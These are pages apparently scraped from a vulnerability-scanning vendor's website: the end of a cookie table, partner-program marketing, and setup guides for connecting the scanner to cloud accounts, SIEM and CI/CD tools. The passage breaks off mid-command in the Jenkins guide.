website's performance. Some of the data that are collected include the number of visitors, their source, and the pages they visit anonymously. 1 day Analytics _gat_gtag_UA_* .edgescan.com Google Analytics sets this cookie to store a unique user ID. 1 minute Analytics visitorId .ws.zoominfo.com ZoomInfo sets this cookie to identify a user. 1 year Functional __cf_bm .zoominfo.com This cookie, set by Cloudflare, is used to support Cloudflare Bot Management. 30 minutes Functional _cfuvid .zoominfo.com No description session Other cookieyes-consent edgescanstage.wpengine.com CookieYes sets this cookie to remember users' consent preferences so that their preferences are respected on their subsequent visits to this site. It does not collect or store any personal information of the site visitors. 1 year Necessary UserMatchHistory .linkedin.com LinkedIn sets this cookie for LinkedIn Ads ID syncing. 1 month Functional AnalyticsSyncHistory .linkedin.com Linkedin set this cookie to store information about the time a sync took place with the lms_analytics cookie. 1 month Analytics bcookie .linkedin.com LinkedIn sets this cookie from LinkedIn share buttons and ad tags to recognize browser ID. 1 year Functional lidc .linkedin.com LinkedIn sets the lidc cookie to facilitate data center selection. 1 day Functional ln_or edgescanstage.wpengine.com Linkedin sets this cookie to registers statistical data on users' behaviour on the website for internal analytics. 1 day Analytics bscookie .www.linkedin.com LinkedIn sets this cookie to store performed actions on the website. 1 year Functional li_gc .linkedin.com Linkedin set this cookie for storing visitor's consent regarding using cookies for non-essential purposes. 5 months 27 days Functional __cf_bm .hubspot.com This cookie, set by Cloudflare, is used to support Cloudflare Bot Management. 30 minutes Functional dtCookie .gartner.com This cookie is set by the provider Dynatrace. This is a session cookie used to collect information for Dynatrace. Its a system to track application performance and user errors. session Performance dtCookie .dynatrace.com This cookie is set by the provider Dynatrace. This is a session cookie used to collect information for Dynatrace. Its a system to track application performance and user errors. session Performance rxVisitor gartner.com This cookie is set by the provider Dynatrace. This cookie is used to store the visitor ID for the returning visitors. never Analytics rxvt gartner.com This cookie is set by the provider Dynatrace. This is a session cookie used to store two timestamps. never Performance dtSa gartner.com This cookie is set by the provider Dynatrace. This is a session cookie used for saving the user action such as Click on Login across different pages. never Functional route-gcrowd-fe-prod .gartner.com No description available. session Other connect.sid .gartner.com This cookie is used for authentication and for secure log-in. It registers the log-in information. past Necessary 3.4. Publicity Cookies Google Some or all of the cookies or other technologies that are described below may be stored in your browser, app or device. How Google Uses Cookies. Cookie Name Purpose(s) Product(s) Cookie Lifespan Domain(s) __gsas Advertising AdSense for Search 3 months Set from partner domain __gpi Advertising AdSense, Google Ad Manager 13 months Set from partner domain __gpi_optout Advertising AdSense, Google Ad Manager 13 months Set from partner domain NID Security, Analytics, Functionality, Advertising AdSense for Search, Google Ads 6 months google.com and local variations, e.g. google.de DSID Security, Functionality, Advertising AdSense, Campaign Manager, Google Ad Manager, Google Analytics, Display & Video 360, Search Ads 360 2 weeks doubleclick.net test_cookie Functionality AdSense, Campaign Manager, Google Ad Manager, Google Analytics, Display & Video 360, Search Ads 360 15 minutes doubleclick.net id Functionality, Advertising AdSense, Campaign Manager, Display & Video 360, Google Ad Manager, Search Ads 360 OPT_OUT: fixed expiration (year 2030/11/09), non-OPT_OUT: 13 months EEA UK / 24 months elsewhere doubleclick.net __gads Advertising AdSense, Display & Video 360, Google Ad Manager, Google Ads 13 months Set from partner domain GED_PLAYLIST_ACTIVITY Advertising AdSense, Google Ad Manager, YouTube Session Set from partner domain ACLK_DATA Advertising AdSense, Google Ad Manager, YouTube 5 minutes youtube.com pm_sess Security, Functionality Campaign Manager, Display & Video 360, Google Ads, Search Ads 360 30 minutes doubleclick.net, google.com pm_sess_NNN Security, Functionality Campaign Manager, Display & Video 360, Google Ads, Search Ads 360 30 minutes doubleclick.net, google.com aboutads_sessNNN Security, Functionality Campaign Manager, Display & Video 360, Google Ads, Search Ads 360 30 minutes doubleclick.net, google.com FPAU Analytics, Advertising Campaign Manager, Display & Video 360, Google Ads, Search Ads 360 90 days Set from partner domain ANID Advertising Campaign Manager, Display & Video 360, Google Ads, Search Ads 360 13 months EEA UK / 24 months elsewhere google.com and local variations, e.g. google.de AID Analytics, Advertising Campaign Manager, Display & Video 360, Google Ads, Search Ads 360 13 months EEA UK / 540 days elsewhere google.com/ads, google.com/ads/measurement, googleadservices.com IDE Advertising Campaign Manager, Display & Video 360, Google Ad Manager, Google Analytics, Search Ads 360 13 months EEA UK / 24 months elsewhere doubleclick.net TAID Analytics, Advertising Campaign Manager, Display & Video 360, Google Ads, Search Ads 360 14 days google.com/ads, google.com/ads/measurement, googleadservices.com FPGCLDC Analytics, Advertising Campaign Manager, Display & Video 360, Search Ads 360 90 days Set from partner domain _gcl_dc Analytics, Advertising Campaign Manager, Display & Video 360, Search Ads 360 90 days Set from partner domain _gcl_au Analytics, Advertising Campaign Manager, Display & Video 360, Google Ads, Search Ads 360 90 days Set from partner domain FLC Advertising Campaign Manager, Display & Video 360, Search Ads 360 10 seconds doubleclick.net RUL Advertising Display & Video 360, Google Ads 12 months doubleclick.net FCCDCF Functionality Funding Choices 13 months Set from partner domain FCNEC Analytics Funding Choices 365 days Set from partner domain FPGCLAW Analytics, Advertising Google Ads 90 days Set from partner domain FPGCLGB Analytics, Advertising Google Ads 90 days Set from partner domain _gcl_gb Analytics, Advertising Google Ads 90 days Set from partner domain _gac_gb_ Analytics, Advertising Google Ads 90 days Set from partner domain _gcl_aw Analytics, Advertising Google Ads 90 days Set from partner domain 1P_JAR Advertising Google Ads 30 days google.com and local variations, e.g. google.de Conversion Advertising Google Ads 90 days www.googleadservices.com/pagead/conversion/ YSC Security Google Ads, YouTube Session youtube.com VISITOR_INFO1_LIVE Security, Advertising Google Ads, YouTube 180 days youtube.com VISITOR_INFO1_LIVE__k Security, Advertising Google Ads, YouTube 180 days youtube.com VISITOR_INFO1_LIVE__default Security, Advertising Google Ads, YouTube 180 days youtube.com FPLC Analytics Google Analytics 20 hours Set from partner domain _ga Analytics Google Analytics 2 years Set from partner domain _gac_ Advertising Google Analytics 90 days Set from partner domain _gid Analytics Google Analytics 24 hours Set from partner domain _gat[_] Analytics Google Analytics 1 minute Set from partner domain __utma Analytics Google Analytics 2 years Set from partner domain __utmb Analytics Google Analytics 30 minutes Set from partner domain __utmc Analytics Google Analytics Session Set from partner domain __utmt Analytics Google Analytics 10 minutes Set from partner domain __utmz Analytics Google Analytics 6 months Set from partner domain __utmv Analytics Google Analytics 2 years Set from partner domain AMP_TOKEN Functionality Google Analytics 30 seconds to 1 year Set from partner domain FPID Analytics Google Analytics 2 years Set from partner domain GA_OPT_OUT Functionality Google Analytics 10 Nov 2030 (all cookies) google-analytics.com _ga_ Analytics Google Analytics 360 2 years Set from partner domain _dc_gtm_ Analytics Google Analytics, Google Tag Manager 1 minute Set from partner domain _gaexp Analytics Google Analytics, Optimize Set by customer; max of 93 days Set from partner domain _gaexp_rc Analytics Google Analytics, Optimize 10 seconds Set from partner domain _opt_awcid Analytics Google Analytics, Optimize 24 hours Set from partner domain _opt_awmid Analytics Google Analytics, Optimize 24 hours Set from partner domain _opt_awgid Analytics Google Analytics, Optimize 24 hours Set from partner domain _opt_awkid Analytics Google Analytics, Optimize 24 hours Set from partner domain _opt_utmc Analytics Google Analytics, Optimize 24 hours Set from partner domain _gcl_gf Analytics, Advertising Google Flights 90 days Set from partner domain _gcl_ha Analytics, Advertising Google Hotel Ads 90 days Set from partner domain PAIDCONTENT Analytics, Advertising Google Surveys 30 days doubleclick.net _opt_expid Analytics Optimize 10 seconds Set from partner domain 4. Contact At Edgescan, your privacy is very important to us, which is why we will always keep this policy up-to-date and notify you whenever there is any change. If you have any questions about this policy or any matter related to the processing of your personal data, please contact us at the following email address: dpo@edgescan.com. ### Thank you Thank you for downloading our white paper! We hope that the information provided was helpful and informative. Your interest in our research and insights is greatly appreciated. We strive to produce valuable content that can be used to improve your business and your industry. If you have any questions or feedback, please feel free to contact us. Thank you again for your support, and we look forward to providing you with more valuable resources in the future. Go Back to Homepage ### Partner The Edgescan Partner Program Whether you're a consultant, a reseller, or a managed service provider (MSP), Edgescan’s award-winning full-stack exposure management & continuous security testing platform will enable you to deliver top-tier security solutions that address today’s evolving cyber threats at scale, all within a flexible and collaborative model. Partner with a   Global Leader By partnering with a global leader in cybersecurity-as-a-service, you can offer your clients a cutting-edge, end to end exposure management solution across the full stack. Edgescan will do the heavy lifting to create the kind of agile and resilient security posture that’s now essential for any enterprise looking to provide safe digital experiences for its customers.This shield will cover not only the web application layer, but also the host and infrastructure layers that support it. The Edgescan solution combines continuous scanning and assessment of web-facing assets with expert validation of flagged vulnerabilities by our highly skilled team of OCSP and CREST-certified human analysts. This approach has disrupted the cybersecurity space by providing continuous threat profiling that yields false-positive-free reports. Our tools provide   Expanded Value We will empower you to offer top-of-the-line vulnerability management as a service while maximizing your existing in-house capabilities. From penetration testing to remediation services, partnering with Edgescan boosts the depth and breadth of coverage you can offer your clients. With end-to-end support—from training and onboarding to collaborative marketing and post-sales assistance—we are committed to you and your business.Edgescan will provide you with the necessary tools to expand your value to your clients, which is why the Edgescan Partner Program features some of the leading cybersecurity and consulting firms worldwide and those partners enjoy a 95% customer retention rate. Just as your customers’ success is fundamental to your success, your success is critical to ours. If you win, we win. Do you want to join the Edgescan Partner Program? Learn More Pillars of Success Quality Our market-leading, full-stack solution enables better value. Edgescan’s market-leading full-stack solution enables our partners to offer differentiated value to their clients. Flexibility Every partnership is unique We’ll work with you to design a collaboration that’s customized to maximize your growth. Edgescan can assist you in making sales or supply all the tools to make them yourself. Once your partner application is approved, we’ll develop an onboarding plan that’s tailored to your needs. Support The best partnerships are built on mutual commitment. Our strategy is to focus on a small number of carefully selected, highly enabled partners in each geographical region. We recognize the importance of agility when competing for business, and we are dedicated to responding to your requests as quickly as possible. This is a continuous journey, and we are committed to supporting your team throughout. Your Channel Team Once your onboarding process is underway, you’ll be connected with a dedicated Channel Team who will ensure you have everything you need to incorporate Edgescan’s full-stack exposure management platform into your portfolio of services. As part of that process, the team will ensure you receive all training on the platform that meets your company’s specific needs. There will be two overarching goals in mind: to fully integrate the solution into your business and help you distinguish your firm in the market. The Edgescan team will seek a wider understanding of your enterprise, the products and services you offer, where you’re looking to go with your business, and the profile of your clients. Using this background, we’ll work with you to identify new opportunities where there may be scope to provide additional value by building on your existing capabilities. As part of our commitment to support your firm throughout the length of the partnership, your dedicated Channel Team will regularly flag relevant industry press, news reports, market developments, and other strategically useful information that you are free to share with your customers and thereby enhance your status as a trusted advisor providing a different level of service. A powerful solution and a committed partnership—that’s the Edgescan difference. Join Us ### Thank you Thank you for downloading our white paper! We hope that the information provided was helpful and informative. Your interest in our research and insights is greatly appreciated. We strive to produce valuable content that can be used to improve your business and your industry. If you have any questions or feedback, please feel free to contact us. Thank you again for your support, and we look forward to providing you with more valuable resources in the future. Go Back to Homepage ### Become a partner Become a partner Edgescan Ignite Partner Program The Edgescan Ignite Partner Program offers Partners the opportunity to work with a global award-winning managed service solution. Take advantage of a wealth of knowledge and support designed to help you deliver better business outcomes. Edgescan’s approach to vulnerability management allows partners to generate high value increased recurring revenue. Partner Benefits Annualised revenue modelIncreased client integration through Edgescan open APIIntegrate easily with your existing SOC processes and technologyAbility to white label and run as your own MSSSales and technical training with access to demo portalCompetitive margins and deal registration discountExpand your pen testing services and other service & revenue streamsWork with Gartner-recommended security as a service platformAccess to dedicated partner portalDedicated co-branded marketing campaignsDirect support from sales team at EdgescanPCI-ASV certified approved scanning vendor Become a partner Take advantage of a wealth of knowledge and support designed to help you deliver better business outcomes. The Edgescan approach to vulnerability management allows partners to increase margins and recurring revenue through high-value business partnerships. ### Blog ## Integrations ### ArmorCode What is ArmorCode: The ArmorCode AppSecOps platform integrates across security tooling to de-dupe, correlate, and orchestrate findings and deliver holistic visibility, agility, and collaboration. Why use ArmorCode: ArmorCode's intelligent application security platform gives us unified visibility into AppSec postures and automates complex DevSecOps workflows. Where to setup integrations: Setup is handled entirely within the ArmorCode platform, customers just need to search for Edgescan and they’ll be guided through the setup. https://edgescanstage.wpengine.com/technology-integrations/ArmorCode/ https://www.armorcode.com/integrations Excerpt: The ArmorCode AppSecOps platform integrates across security tooling to de-dupe, correlate, and orchestrate findings and deliver holistic visibility, agility, and collaboration. ### Splunk Edgescan Integration Add-on 1 - On Splunk homebase search Edgescan or click here 2 - Click Download 3 - From Splunk Web click on the gear beside ‘Apps’ 4 - Select ‘Install app from file 5 - Locate the downloaded file and click Upload 6 - If Splunk Enterprise prompts you to restart, do so. 7 - Verify the add-on appears in the list of apps and add-ons. You can also find it on the server at $SPLUNK_HOME/etc/apps /.   Importing data into the Edgescan Integration 1 - Edgescan should be available in the lists of apps on the left hand side of your splunk enterprise homepage. Click on Edgescan. 2 - Under the inputs tab select Create New Input 3 - Select one of the options in the dropdown 4- Enter a name, interval, Index, Offset, Limit and X-Api-Token and click Add a. Name - A name associated to the data, e.g Edgescan_vulnerabilities b. Interval - time interval of input in seconds, e.g 900 c. Index - default d. Offset - where server starts returning the rows. Default is 0. e. Limit - how many results returned from the server. Default is 250. f. X-Api-Token - API Key obtained from https://live.edgescan.com 5 - Under the ‘Search’ tab in the search bar there is the ability to search and filter through the results   Excerpt: Splunk Inc. is an American software company based in San Francisco, California, that produces software for searching, monitoring, and analyzing machine-generated data via a web-style interface. ### Microsoft Azure Microsoft Azure Onboarding Integration Keeps your Azure public IP addresses, and hostnames from DNS zones, updated as assets in edgescan. How to connect Azure to edgescan 1. Create an application for edgescan in Azure Login to the Azure management portal. Search for App registrations using the search functionality and click to get to the App Click on the New registration button. Enter a name (we recommend 'edgescan' or something similar) then click Register. 2. Get the Application ID, Application secret key, Directory ID and Subscription ID from Azure We require four access keys to connect your Azure account to edgescan: 'Application (client) ID' of the Azure application you just created. 'Directory (tenant) ID' from Azure Active Directory. Application secret key' of the Azure application you just created. 'Subscription ID' of your Azure subscription. You need to get them from various sections of the Azure portal, so it's probably best to open a text document that you can copy them into. It should all be straight-forward if you follow the steps below, so hang in there! Application (client) ID Click on the 'edgescan' application that we just created Click Overview and take a note of the Application (client) ID. Directory (tenant) ID You can also get the Directory (tenant) ID from this screen so let's note that one down too. Application secret key (in Azure you’re looking for the secret ‘VALUE’ Now scroll down and click on Certificates & secrets in the left navigation panel. Click on New client secret: Enter a description (e.g. ‘edgescan’) Set an expiry date (i.e. how long you want the secret to be valid for). (Please note that edgescan will no longer be able to access your Azure account when the secret expires.) Now click Add and note down the secret ' VALUE '. ( Not the Secret ID). (This is the Application secret key .) Important: Please note that you won't be able to see that Application secret key again after you've left this screen, so make sure you copy and paste it now! Subscription ID Search for 'Subscriptions' using the search functionality and click to see the 'Subscriptions' menu. Take note of your Azure Subscription ID: 3. Create a role Select Access control (IAM) from the left menu inside the subscription detail page. Click Add. Then click Add role assignment . A new menu will appear on the right of the screen. Type Reader into the search box. Click on the Reader item in the drop-down. (We require read-only access in order to fetch your public IP addresses and DNS hostnames.) Assign access to: Ensure Azure AD user, group, or application is selected. Select: Search for the application we created earlier (e.g. ‘edgescan’ or whatever you chose to name it). Select that application, and click Save. 4. Take note of the Application ID, Application secret key, Directory ID and Subscription ID and provide them to edgescan. Excerpt: Microsoft Azure Onboarding Integration ### AWS AWS Role AWS User     AWS Onboarding Integration - STS Authentication Keeps your EC2 Elastic IP addresses or Amazon Route 53 hostnames updated as assets in edgescan. Connect AWS to edgescan Create a new IAM role & provide access 1. Sign in to the AWS Management Console and open the IAM console at https://console.aws.amazon.com/iam/. 2. In the navigation pane of the console, choose Roles and then choose Create role. 3. Choose AWS account role type. 4. Choose Another AWS account and enter the Account ID to which you want to grant access to your resources. This should be Edgescan’s AWS account ID which must be requested. 5. Select Require external ID, and input edgescan-cloud-onboard- followed by a unique ID. For example, edgescan-cloud-onboard-159ahw8Vq736lmbi . Note: The external ID will need to be shared with edgescan later so make sure to take note of it here. 6. Click Next . The new role will need to be granted permissions using the following AWS policies: 'IAMReadOnlyAccess' - Used to fetch the "account alias" of the AWS account. 'AmazonEC2ReadOnlyAccess' - Used to fetch EC2 Elastic IP addresses. 'AmazonRoute53ReadOnlyAccess' - Used to fetch Route 53 hostnames. 7. On the next page add a role name, edgescan-cloud-onboarder for example, and leave a description if you’d like to go into further detail about the role. 8. Review the role and then choose Create role. 9. Provide edgescan with the External ID and the new Role ARN.     AWS Onboarding Integration Keeps your EC2 Elastic IP addresses or Amazon Route 53 hostnames updated as assets in edgescan. Connect AWS to edgescan Add a new IAM user & provide access keys Since you are connecting edgescan to your AWS account via access keys, we recommend creating a new user in your AWS account. When creating a new user, please ensure that Programmatic access is checked. The new user will need to be granted permissions using the following AWS policies: 'IAMReadOnlyAccess' - Used to fetch the "account alias" of the AWS account 'AmazonEC2ReadOnlyAccess' - Used to fetch EC2 Elastic IP addresses 'AmazonRoute53ReadOnlyAccess' - Used to fetch Route 53 hostnames Accounts with the 'AdministratorAccess' policy could also be used, but we would advise against this. Once your new user account is ready you'll need to generate an access/secret key pair. AWS have a guide on how to do this, here's the main steps: In the IAM console under Users, click on the new user's name Select the Security credentials tab Click Create access key in the Access keys section to create a key pair that consists of an Access key ID and Secret access key Take note of both of these keys and provide them to edgescan. Excerpt: AWS Onboarding Integration – STS Authentication ### Google Cloud Google Cloud Platform Onboarding Integration Keeps your External IP addresses and hostnames from Cloud DNS updated as assets in edgescan. Enable Google Cloud APIs In order for the Google Cloud integration to work, you'll need to enable some APIs using the GCP console. Select your project, then under APIs & Services click Enable APIs and Services : Use the search to to find the following APIs and enable them: Compute Engine API (required to sync external and ephemeral IP addresses) Cloud Resource Manager API (required to sync external and ephemeral IP addresses) Google Cloud DNS API (required to sync Google Cloud DNS records) Connect Google Cloud Platform by Go to the IAM & Admin menu in your GCP console: Click on Service Accounts and then click Create Service Account : Give your new service account name and a description, then click create: Grant the service account Compute Network Viewer and DNS Reader permissions to your project, these are required to list your external IP addresses and DNS hostnames: Click the Create Key button to download the key file for your new service account: Select to create the key in JSON format and download the key file and keep it in a safe place. This key grants read access to your project. Provide edgescan with the key file.   Excerpt: Keeps your External IP addresses and hostnames from Cloud DNS updated as assets in edgescan. ### Axonius How to Integrate Edgescan Domain (required) – The hostname of the Edgescan server. API Key (required) – The API Key that has read access to the server. Verify SSL (required, default: False) – Verify the SSL certificate offered by the host supplied in EdgeScan Domain. For more details, see SSL Trust & CA Settings. If enabled, the SSL certificate offered by the host will be verified against the CA database inside of Axonius. If it fails validation, the connection will fail with an error. If disabled, the SSL certificate offered by the host will not be verified against the CA database inside of Axonius. HTTPS Proxy (optional, default: empty) – A proxy to use when connecting to EdgeScan Domain. If supplied, Axonius will utilize the proxy when connecting to the host defined for this connection. If not supplied, it will connect directly to the host defined for this connection. Excerpt: Axonius is a cybersecurity asset management platform that can give organizations a comprehensive asset inventory. Edgescan’s integration allows users to synchronize vulnerability and asset data into the Axonius platform to deliver a comprehensive and credible asset inventory for security, IT and risk teams. ### Azure Pipelines How to Integrate Edgescan & Azure Pipelines. With the Azure Pipelines connector for Edgescan, you can build application vulnerability scans into existing CI/CD processes.  The connector allows DevOps teams to initiate VM scanning directly from their pipelines.  Once initiated, a scan will take place, and a pass/fail will be returned depending on configured criteria.  The build will fail if the results do not match the configured criteria.  Otherwise, the build will proceed to the next step if applicable. Edgescan makes it easy to add security scanning to Azure Pipelines. The basic steps are: 1. Configure your Pipeline by adding or editing the azure-pipelines.yml file in your project repository 2. Configure Edgescan by CLI or with environment variables 3. Secure your API key as a secret Variable in your Pipeline Edgescan API Key When you signed up with Edgescan, you created an API key. You will need your this API key, so be sure to record it. Create a Git Repo If you don’t already have a Git repo, go ahead and create one for this tutorial. We recommend Azure Repos, Bitbucket, or GitHub for ease of integration. Configure Your Azure Pipelines At the base directory of your code repository, add an azure-pipelines.yml file to configure Azure Pipelines to run HawkScan. pool: vmImage: 'ubuntu-latest' jobs: - job: Remote_Scan steps: - script: > docker run -t -e ES_API_TOKEN="${ES_API_TOKEN}" -e ES_ASSET="${ES_ASSET_ID}" edgescan/cicd-integration displayName: Run Edgescan env: ES_API_TOKEN: $(es_api_token) ES_ASSET_ID: $(es_asset_id) This configuration tells Pipelines to run a single job which runs the Edgescan Docker image. The job will pass the Edgescan API token and your asset ID as environment variables, taken from some secret Pipeline Variables, which we will set up momentarily. The job will wait for the scan results before finishing. The final command could also be: docker run -t edgescan/cicd-integration --asset-id ${ES_API_TOKEN} --api-token ${ES_ASSET_ID} Add, commit, and push azure-pipelines.yml to your Git repository. Create an Azure Pipelines Make sure the file above have been pushed to your central Git repo so that Azure Pipelines can find them. From your Azure DevOps Console, select (or create) the Project you wish to add a Pipeline to. From your Project, select Pipelines from the left pane. Then click the blue New Pipeline button to create a new Pipeline. From here, Azure will step you through the process of adding your repository, as follows: – Where is your code? Select your provider, Azure Repos, Bitbucket, or GitHub – Select a repository – Select the repo you just pushed your new configurations to – Configure your pipeline – Select “Existing Azure Pipelines YAML File” – Select an Existing YAML File – Enter azure-pipelines.yml in the Path field – Review your pipeline YAML – Click the grey Variables button – Variables – Click the blue New variable button In the New variable dialogue, name your variable es_api_token, and add your Edgescan API key as the Value. Check the box to Keep this value secret. Save the variable. Do the same for your asset ID and name it es_asset_id. Run It Now that you have identified your Pipeline configuration file and saved your API key and asset ID as Variables, Pipelines will allow you to Review your pipeline YAML. It should contain exactly the Pipeline code you entered from above. Hit the blue Run button, and watch your pipeline run. You should see the Edgescan container run and print some summary information to the screen when the scan is complete. Excerpt: Azure Pipelines automatically builds and tests code projects to make them available to others. It works with just about any language or project type. Azure Pipelines combines continuous integration (CI) and continuous delivery (CD) to test and build your code and ship it to any target. ### Azure Sentinel How to Integrate Edgescan & Azure Sentinel. Azure Sentinel Integration This package contains three separate logic apps: edgescan_vulnerabilities edgescan_assets edgescan_hosts The end goal of this document is to set up Azure Sentinel logic apps that run daily and ingest records created in Edgescan over the past two days. The logic apps will scan the entries created within the last 7 days in the custom logs in Azure Sentinel for IDs duplicate IDs before adding a new entry to the corresponding log. The logic app templates you will deploy, however, are created for the initial run, which is missing this duplicate checking logic and are instead geared to pull in all data. This documentation will walk you through executing this initial run and then walk you through the changes needed to achieve the end goal. Entries will be stored in Azure Sentinel custom logs with the following table names: edgescan_vulnerabilities_CL edgescan_assets_CL edgescan_hosts_CL Viewing Custom Logs From your home page, navigate to the Azure Sentinel service There, select the workspace your deployed logic apps reference There, click on Logs in the left-hand menu and expand Custom Logs edgescan_vulnerabilities   edgescan_assets   edgescan_hosts   Excerpt: Azure Sentinel delivers intelligent security analytics and threat intelligence across the enterprise, providing a single solution for attack detection, threat visibility, proactive hunting, and threat response. ### CI/CD CI/CD Edgescan has identified the need to shift left and identify vulnerabilities earlier in the software development lifecycle. For this reason, a fully supported plugin was developed for CI/CD pipelines.  This integration allows DevOps teams to initiate VM scanning from their chosen platform.  Once initiated, a scan will take place, and a pass/fail will be returned depending on configured criteria.  The build will fail if the results do not match the configured criteria.  Otherwise, the build will proceed to the next step if applicable. This docker image can be deployed to any appropriate environment. Download Docker Image Edgescan CI/CD integration This image allows to kick off an assessment and fails/succeeds according to its result. It succeeds if the assessment completes with no vulnerabilities found (a tolerance for the risk level can be provided), it fails otherwise. When it’s not waiting for the scan to finish it succeeds once the assessment is started. The program will exit with value 0 on success and -1 otherwise. Getting started Pull the Docker image docker pull edgescan/cicd-integration Execute the Docker image and append --help for details about its usage docker run --tty edgescan/cicd-integration --help Configuration can be provided in 3 ways (in order of priority) 1. CLI flags 2. YAML configuration file 3. Environment variables Parameter Command line flag Field name in configuration file Environment variable name Default value Required Asset ID –asset-id asset_id ES_ASSET_ID None True API Token –api-token api_token ES_API_TOKEN None True Base URL –base-url base_url ES_BASE_URL “https://live.edgescan.com” False Max Risk Threshold –max-risk-threshold max_risk_threshold MAX_RISK_THRESHOLD 3 False Wait –wait / –no-wait wait WAIT True False Color –color / –no-color color COLOR True False Proxy –proxy proxy PROXY None False Execute the Docker image Executing with the command line interface docker run --tty edgescan/cicd-integration --asset-id 1234 --api-token th34p1t0ken Executing with a YAML config file docker run --tty -v /local/path/to/file.yml:/cicd-config.yml edgescan/cicd-integration Executing with environment variables docker run --tty -e ES_API_TOKEN="th34p1t0ken" -e ES_ASSET=1234 edgescan/cicd-integration Executing with a dotenv file docker run --tty --env-file .env edgescan/cicd-integration Executing with 3 methods docker run --tty -v /path/to/file.yml:/cicd-config.yml --env-file .env edgescan/cicd-integration --asset-id 1234 Excerpt: In software engineering, CI/CD or CICD is the combined practices of continuous integration and either continuous delivery or continuous deployment. CI/CD bridges the gaps between development and operation activities and teams by enforcing automation in building, testing and deployment of applications. ### Cortex XSOAR How to Integrate with Edgescan: Cortex-xsoar & Edgescan Integration Documentation Excerpt: Cortex XSOAR is a comprehensive security orchestration, automation and response (SOAR) platform that unifies case management, automation, real-time collaboration and threat intel management to serve security teams across the incident lifecycle. ### DefectDojo How to Integrate Edgescan & DefectDojo. Import Vulnerabilities as JSON Export Edgescan Vulnerabilities as JSON To export Vulnerabilities login to https://live.edgescan.com. Click Vulnerabilities in the top menu bar, and add the necessary filters. For example, to get all open vulnerabilities for a specific asset the following filters should be used: Asset In “Example Asset” Status Equal Open Then, click the Export button in the top right of the screen. Select Export as JSON and click Download here. Import Vulnerabilities as Findings Go to the Product that you want to import the Vulnerabilities for. In the top menu, click Findings and Import Scan Results. Fill in the required fields: Scan type: select Edgescan Scan, not Edgescan API Scan Choose report file: Select the vulnerabilities JSON file that was exported Finally, click Import and the Findings should appear. Import Vulnerabilities by API Generate Edgescan API Key An Edgescan API key will be required. To generate a key login to https://live.edgescan.com. In the top right of the menu bar, click the ? icon, and go to Account settings. In the Label input box enter a token name and click Create. Take note of the generated API token. DefectDojo Tool Configuration Configure the Edgescan authentication details by navigating to Configuration / Tool Configuration, selecting the Tool Type to “Edgescan”, and Authentication Type to “API Key”. Paste your Edgescan API key in the “API Key” field. Click Submit DefectDojo API Scan Configuration Go to the specific Product page and click Settings -> Add API Scan Configuration and select the previously added Edgescan Tool Configuration. Provide the ID of the asset from which to import findings in the field Service key 1. Click Save Import Vulnerabilities as Findings On the Product page click Findings -> Import Scan Results . You can import the findings by selecting “Edgescan Scan” as the scan type, and select the Edgescan API Scan Configuration. Click Import, and any open Vulnerabilities for the selected Assetwill be imported as Findings. Excerpt: DefectDojo is a security orchestration and vulnerability management platform. DefectDojo allows you to manage your application security program, maintain product and application information, triage vulnerabilities and push findings to systems like JIRA and Slack. DefectDojo enriches and refines vulnerability data using a number of heuristic algorithms that improve with the more you use the platform. ### Freshworks Webhooks and Freshdesk Tickets A Webhook is an HTTP request that is triggered when an event occurs. The event Webhooks allow you to send edgescan data to other applications. Freshdesk ticketing helps you keep track of many issues and assign them to the right agents. Create a Freshdesk Authentication Header Get your Freshdesk API key: How to find your API key In order to use the API key it needs to be encoded. If the API key is 4p1t0k3n, then base64 encode it using the command: echo -n "4p1t0k3n:X" | base64 The result is NHAxdDBrM246WA==, then the authentication header will be: Authorization:Basic NHAxdDBrM246WA== Setup Freshdesk Event Webhook On edgescan navigate to the events page by going to Account/Settings -> Events. Create a new event and give it an appropriate name. In the first drop down select the event you want e.g. vulnerability opened. Enable the Trigger a webhook event. Enter https://.freshdesk.com/api/v2/tickets as the URL. Ensure the HTTP is POST. Add the authentication header from the above section. Select JSON - Freshdesk as the payload. The ‘Send a separate request for each item’ checkbox will create a new ticket for each vulnerability when checked, otherwise it will create one ticket with many vulnerability details. Save the event, and you’re all set up! You can test that it is working by using the Test -> Notification button in the top right Excerpt: A Webhook is an HTTP request that is triggered when an event occurs. The event Webhooks allow you to send edgescan data to other applications. Freshdesk ticketing helps you keep track of many issues and assign them to the right agents. ### GitHub Actions How to Integrate with Edgescan: With our Edgescan integration Docker image, it’s simple to add scanning to your GitHub Actions workflow. To integrate with Edgescan, simply: 1. Secure your API key as a Secret in your GitHub repository 2. Configure your workflow with a .github/workflows/edgescan.yml file 3. Configure Edgescan by CLI or with environment variables Secure your API Key When you signed up with Edgescan, you created an API key. To keep it a secret, and out of your repository, copy it to a GitHub secret for your repository. On GitHub, find your repository, and click into the ⚙️Settings tab near the top right side of the screen. Then click Secrets near the bottom left. Add your Edgescan API key as a secret called ES_API_KEY. Other variables like the asset ID can also be set this way. Configure Your Workflow At the base directory of your code repository, add a .github/workflows/edgescan.yml file to configure GitHub Actions to run Edgescan. Your file should look like this. name: Edgescan on: push: pull_request: jobs: edgescan: name: Edgescan runs-on: ubuntu-latest steps: - name: Clone repo uses: actions/checkout@v2 - name: Pull Edgescan Docker Image run: | docker pull edgescan/cicd-integration - name: Run Edgescan run: | docker run -t -e ES_API_TOKEN="${{ secrets.ES_API_TOKEN }}" -e ES_ASSET="${{ secrets.ES_ASSET }}" edgescan/cicd-integration This configuration tells GitHub Actions to pull the Edgescan Docker image, and using your API token, scan your asset, and wait for the results. The final command could also be: docker run -t edgescan/cicd-integration --asset-id ${{ secrets.ES_API_TOKEN }} --api-token ${{ secrets.ES_ASSET }} Run It Check the workflow file into source control, and push it to GitHub. Head over to the GitHub Actions console to watch your workflow run. Excerpt: GitHub Actions is a continuous integration and continuous delivery (CI/CD) platform that allows you to automate your build, test, and deployment pipeline. You can create workflows that build and test every pull request to your repository, or deploy merged pull requests to production. ### Jenkins How to Integrate with Edgescan: The Edgescan plugin allows DevOps teams to initiate VM scanning directly from Jenkins.  Once initiated, a scan will take place, and a pass/fail will be returned depending on configured criteria.  The build will fail if the results do not match the configured criteria.  Otherwise, the build will proceed to the next step if applicable. It is the most popular CI/CD system in use today, with a rich ecosystem of plugins, and virtually unlimited flexibility. And of course, it’s easy to get Edgescan integrated into their pipelines. Let’s get started with a simple example. Server Requirements You will need a recent version of Jenkins with the default recommended set of plugins. That should include the Pipeline and Credentials plugins. Your server or build node needs Docker. For our test, we installed Jenkins and Docker on the same server, and we added the jenkins user to the docker group so that Jenkins jobs could access the Docker daemon, like so: $ sudo usermod -a -G docker 